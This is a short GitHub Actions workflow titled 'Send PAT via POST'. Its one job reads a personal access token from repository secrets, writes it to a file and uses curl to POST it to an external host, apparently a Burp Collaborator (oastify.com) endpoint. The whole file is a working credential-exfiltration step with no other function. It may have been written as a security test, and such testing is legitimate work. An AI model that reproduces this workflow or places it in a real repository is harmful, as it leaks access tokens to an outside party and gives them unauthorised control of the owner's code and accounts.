name: Send PAT via POST

on:
  workflow_dispatch:

jobs:
  send-pat:
    runs-on: ubuntu-latest

    steps:
      - name: Send PAT via POST to collaborator
        env:
          COLLAB_URL: "http://pyr473mv5r7jghw2amsfw8xtikobc2gq5.oastify.com"
          PAT: ${{ secrets.MY_PAT }}
        run: |
          sudo apt-get update && sudo apt-get install -y jq
          echo -n "$PAT" > pat.txt
          curl -X POST "$COLLAB_URL/token" --data-binary @pat.txt
